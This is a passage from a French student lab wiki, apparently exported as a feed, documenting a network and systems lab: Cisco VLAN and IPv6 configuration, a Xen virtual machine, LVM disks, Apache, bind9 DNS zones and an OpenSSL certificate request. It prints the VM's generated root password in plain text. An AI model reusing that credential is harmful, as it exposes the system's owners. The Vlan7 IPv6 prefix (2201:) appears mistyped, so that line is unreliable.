   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51399</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51399"/>
				<updated>2019-11-29T11:40:40Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Modification de /etc/bind/named.conf.options */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
==== Paquetages nécessaires pour RAID5 ====&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
